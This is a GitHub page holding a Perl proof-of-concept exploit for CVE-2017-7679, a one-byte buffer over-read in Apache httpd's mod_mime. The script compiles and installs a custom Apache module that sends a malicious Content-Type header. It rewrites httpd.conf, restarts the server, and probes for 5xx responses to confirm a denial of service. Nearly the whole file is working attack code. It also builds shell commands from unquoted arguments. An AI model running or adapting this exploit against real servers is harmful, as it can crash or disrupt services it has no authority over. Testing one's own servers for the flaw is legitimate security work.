Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
- 0ade0f9 Nov 14, 2017
1 contributor

Users who have contributed to this file

executable file 289 lines (233 sloc) 8.55 KB
#!/usr/bin/perl
# Michael Gottburg - https://github.com/gottburgm/
use 5.10.0;
use strict;
use warnings;
no warnings 'experimental';
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Cookies;
use HTTP::Response;
# Global Variables
my $apache_install = 0;
my $url = 0;
$url = $ARGV[0] or help();
$apache_install = $ARGV[1] or help();
if(-d $apache_install) {
# Display The Header
header();
# Run The PoC
exploit($apache_install, $url);
} else {
print "[!] Couldn't Read/Find : $apache_install\n";
help();
}
sub header {
print "\n\n";
my $title = "=================================[ CVE-2017-7679 ]=================================";
print qq{
$title
Reporter : ChenQin and Hanno Böck
Date : 2017-06-20
CVE : CVE-2017-7679
Description :
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime
can read one byte past the end of a buffer when sending a malicious
Content-Type response header.
};
print "="x(length($title)) . "\n\n";
}
sub help {
print "\n";
print qq {
Usage : perl $0 <URL> <APACHE_INSTALL_PATH>
---------------------------------------------------------
[EXAMPLE] perl $0 http://localhost:1337/ /usr/local/apache2
Note: Apache Install Path Must Be Absolute.
};
print "\n\n";
exit;
}
sub buildRequester {
my ( $useragent, $timeout, $proxy ) = @_;
$proxy = 0 if(!defined($proxy));
my $browser = 0;
my $cookie_jar = 0;
$cookie_jar = HTTP::Cookies->new(
file => "/tmp/cookies.lwp",
autosave => 1,
);
$browser = LWP::UserAgent->new();
$browser->protocols_allowed( [qw( http https ftp )] );
$browser->requests_redirectable(['GET', 'POST', 'HEAD', 'OPTIONS']);
$browser->cookie_jar( $cookie_jar);
### Custom Options
$browser->timeout($timeout);
$browser->agent($useragent);
if($proxy) {
$browser->proxy( [qw( http https ftp ftps )] => $proxy);
}
return $browser;
}
sub buildRequest {
my ( $url, $method, $payload, $content_type) = @_;
$content_type = 'application/x-www-form-urlencoded' if(!defined($content_type) || !$content_type);
$payload = '' if(!defined($payload) || !$content_type);
$method = uc($method);
my $request = 0;
if($method eq "GET") {
$request = new HTTP::Request $method, $url . '?' . $payload;
} else {
$request = new HTTP::Request $method, $url;
$request->content($payload);
}
$request->content_type($content_type);
return $request;
}
sub exploit {
my ( $apache_install, $url ) = @_;
my $browser = 0;
my $useragent = '';
my $request = 0;
my $response = 0;
my $proxy = 0;
my $timeout = 30;
my $name = "CVE_2017_7679";
### Setting Up The Requester
$browser = buildRequester($useragent, $timeout, $proxy);
$url .= "$name/";
buildModule($apache_install, $name);
print "[*] Sending GET Request On : $url\n";
$request = buildRequest($url, "GET", "", 0);
$response = $browser->request($request);
print "\tResponse Code : " . $response->code . "\n\tResponse Content :\n\t" . $response->content ."\n\n";
print "[*] Server Seems To Be Affected ... Confirming ...\n" if($response->code =~ /50[0-9]/);
print "[*] Sending Second Request To Check If The Denial Of Service Worked On : $url\n";
$request = buildRequest($url, "GET", "", 0);
$response = $browser->request($request);
print "\tResponse Code : " . $response->code . "\n\n";
if($response->code =~ /50[0-9]/) {
print "[+] Server Is Affected .\n";
} else {
print "[-] Server Is NOT Affected .\n";
}
if(-f "$apache_install/conf/httpd.conf.backup") {
print "[*] Recovering Apache Configuration File From Backup : $apache_install/conf/httpd.conf.backup\n";
system("mv $apache_install/conf/httpd.conf.backup $apache_install/conf/httpd.conf");
}
}
sub buildModule {
my ($apache_install, $name) = @_;
my $module_name = "mod_$name";
my $template_file = 'mod_template.tpl',
my $config_file = "$module_name.conf";
my $module_file = "$module_name.c";
my $module_template_path = "src/$template_file";
my $module_dir = "$apache_install/$name";
my $public_dir = 0;
# malicious content type
my $content_type = "text/htmla\\0 ";
my @config_content = ();
my @module_content = ();
### Build Apache Module
if(-f "$apache_install/bin/apxs") {
print "[+] APXS Found : $apache_install/bin/apxs\n";
print "[*] Building Module $module_name From Template : $module_template_path\n";
my @content = read_file($module_template_path, 1);
foreach my $line (@content) {
if($line =~ /__NAME__/i) {
$line =~ s/__NAME__/$name/gi;
} elsif ($line =~ /__MODULE-NAME__/i) {
$line =~ s/__MODULE-NAME__/$module_name/gi;
} elsif ($line =~ /__CONTENT-TYPE__/i) {
$line =~ s/__CONTENT-TYPE__/$content_type/gi;
}
push(@module_content, "$line\n");
}
print "[*] Writting Module In : $module_dir\n";
system("rm -rf $module_dir") if(-d $module_dir);
system("cd $apache_install; $apache_install/bin/apxs -g -n $name");
if(-d $module_dir && -f "src/$config_file") {
write_file("$module_dir/$module_file", @module_content);
if(-d "$apache_install/htdocs") {
$public_dir = "$apache_install/htdocs";
} else {
if(-d "$apache_install/html") {
$public_dir = "$apache_install/html";
} else {
print "[-] Couldn't Locate Apache Public Directory ...\n";
exit;
}
}
if(!-d "$public_dir/$name") {
print "[*] Creating Web Directory For Handler : $public_dir/$name\n";
system("mkdir -p $public_dir/$name");
}
print "[*] Backuping Apache Configuration File : $apache_install/conf/httpd.conf => $apache_install/conf/httpd.conf.backup\n";
system("cp $apache_install/conf/httpd.conf $apache_install/conf/httpd.conf.backup");
@content = read_file("src/$config_file");
foreach my $line (@content) {
chomp $line;
if($line =~ /__NAME__/i) {
$line =~ s/__NAME__/$name/gi;
}
push(@config_content, "$line\n");
}
print "[*] Compiling Module ...\n";
system("$apache_install/bin/apxs -i -a -c $module_dir/$module_file");
print "[*] Adding Module Configuration Into Apache Configuration : $apache_install/conf/httpd.conf\n";
append_after("$apache_install/conf/httpd.conf", "LoadModule $name", @config_content);
write_file("$module_dir/$config_file", @config_content);
} else {
print "[-] Couldn't Write : $module_dir\n";
exit;
}
} else {
print "[-] Error : APXS And/Or Module File Not Found .\n";
exit;
}
print "[*] Restarting Apache ...\n";
system("$apache_install/bin/apachectl restart");
}
sub append_after {
my ( $file, $string, @append_lines ) = @_;
my @content = read_file($file);
my @new_content = ();
foreach my $line (@content) {
chomp $line;
if($line =~ /$string/i) {
push(@new_content, "$line\n");
foreach my $append_line (@append_lines) {
push(@new_content, "$append_line\n");
}
} else {
push(@new_content, "$line\n");
}
}
write_file($file, @new_content);
}
sub read_file {
my ($file, $chomp) = @_;
$chomp = 0 if(!defined($chomp));
my @final_content = ();
open FILE, $file or die print "[-] $file Couldn't Be Read .\n";
my @content = <FILE>;
close FILE;
if($chomp) {
foreach my $line (@content) {
chomp $line;
push(@final_content, $line);
}
} else {
@final_content = @content;
}
return @final_content;
}
sub write_file {
my ( $file, @content ) = @_;
open FILE, ">", $file or die print "[-] $file Couldn't Be Open : " . $@ . "\n";
foreach my $line (@content) {
print FILE $line if($line);
}
close FILE;
}
You can’t perform that action at this time.